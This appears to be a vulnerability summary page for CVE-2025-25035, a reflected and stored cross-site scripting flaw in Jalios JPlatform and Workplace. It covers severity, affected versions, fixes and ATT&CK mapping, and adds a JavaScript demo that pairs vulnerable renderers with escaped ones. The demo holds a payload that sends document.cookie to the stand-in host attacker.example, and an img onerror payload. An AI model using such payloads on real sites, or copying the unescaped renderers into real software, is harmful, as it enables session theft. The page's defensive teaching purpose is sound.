CVE-2025-25035
Published: 21 March 2025
Description
Adversaries may abuse various implementations of JavaScript for execution (the opening of the MITRE ATT&CK description of T1059.007, the technique mapped to this CVE below).
Security Summary
CVE-2025-25035 is an Improper Neutralization of Input During Web Page Generation vulnerability (CWE-79) that enables both reflected and stored Cross-Site Scripting (XSS) in Jalios JPlatform 10 and Jalios Workplace. Affected are JPlatform 10 builds earlier than the fixed service packs (10.0.8 SP8, 10.0.7 SP7 and 10.0.6 SP6 on their respective branches) and Jalios Workplace 6.2, 6.1, 6.0, and 5.3 through 5.5. The CVSS v3.1 base score is 7.3 (AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N): high severity, driven by the high confidentiality and integrity impact; availability is not affected and scope is unchanged.
Exploitation requires network access and a low-privileged account (for example a standard user), has low attack complexity, and needs interaction from a victim, such as clicking a crafted link or viewing a page that contains the injected content. An attacker can inject script into pages served by the platform: in the reflected variant the payload executes immediately in the browser of whoever follows the crafted link, in the stored variant it is persisted by the application and executes for every user who later views the affected content. Because the platform is an intranet and collaboration product, a stored payload can reach many authenticated users at once. Successful exploitation allows theft of data available to the victim's browser, such as session cookies or credentials, and unauthorized modification of page content or user data in the victim's session context.
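To make the bug class concrete, here is an added example that is not Jalios JPlatform code: a minimal server-side renderer in JavaScript with a reflected and a stored injection point, each beside its output-encoded form. The page, parameter and function names are hypothetical; the payloads are constructed for the demonstration and are not taken from the vendor advisory.

```javascript
// Added example illustrating CWE-79 (reflected and stored XSS) as described for
// CVE-2025-25035. NOT Jalios JPlatform code: all names here are hypothetical.

// Entity map for an HTML text or double-quoted attribute context.
const htmlEscapes = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Encode untrusted data at the point where it is inserted into HTML.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => htmlEscapes[ch]);
}

// Reflected XSS: the search term from the request is concatenated straight into the page.
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// Hardened version of the same page: the term is encoded for the HTML text context.
function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Stored XSS: content persisted by one user is rendered for every later viewer.
const commentStore = [];
function storeComment(author, body) {
  commentStore.push({ author, body });
}

function renderCommentsVulnerable() {
  return commentStore.map((c) => `<li><b>${c.author}</b>: ${c.body}</li>`).join("");
}

function renderCommentsSafe() {
  return commentStore
    .map((c) => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join("");
}

// Demo-only check: does the rendered HTML still contain an executable tag or
// event handler? A regex is enough for this illustration, not for real scanning.
function containsActiveMarkup(html) {
  return /<script\b|<img\b[^>]*\bonerror=/i.test(html);
}

// Constructed payloads for the two variants.
const reflectedPayload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';
const storedPayload = '<img src=x onerror="alert(document.domain)">';

console.log("reflected, vulnerable:", containsActiveMarkup(renderSearchVulnerable(reflectedPayload)));
console.log("reflected, hardened:  ", containsActiveMarkup(renderSearchSafe(reflectedPayload)));
storeComment("mallory", storedPayload);
console.log("stored, vulnerable:   ", containsActiveMarkup(renderCommentsVulnerable()));
console.log("stored, hardened:     ", containsActiveMarkup(renderCommentsSafe()));
```

The encoder above is only correct for HTML text and double-quoted attribute values; data inserted into a JavaScript block, a URL, or a CSS context needs the encoder for that context, and a template engine that escapes by default is preferable to hand-placed calls. Input filtering on the way in is not a substitute: the stored variant shows why the encoding has to happen at render time, because the data may have entered the system long before it is displayed.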
Vendor advisories, including the Jalios security alert at https://community.jalios.com/jcms/jc1_893720/en/security-alert-2025-02-19 and the related issue-tracker entries (JCMS-11246, JCMS-11248, JCMS-11259), describe the fix as delivered in the service packs listed above, for example upgrading JPlatform 10.0.8 to SP8 or the corresponding service pack for the 10.0.7 and 10.0.6 branches. Additional guidance is available in the VulnCheck advisory at https://vulncheck.com/advisories/jalios-jplatform-xss. Practitioners should confirm that each deployment is running at least the fixed service pack for its branch, apply the update promptly where it is not, and keep in mind that exploitation needs only a low-privileged account, so self-registration or broadly shared accounts enlarge the set of potential attackers.
Details
- CWE(s): CWE-79, Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
- MITRE ATT&CK Enterprise Techniques: T1190 (Exploit Public-Facing Application), T1059.007 (Command and Scripting Interpreter: JavaScript)
Why these techniques?
The CVE describes a reflected/stored XSS vulnerability (CWE-79) in a web platform. Injecting the payload over the network into the application maps to exploitation of a public-facing application (T1190), and the resulting execution of attacker-controlled JavaScript in victims' browsers maps to T1059.007.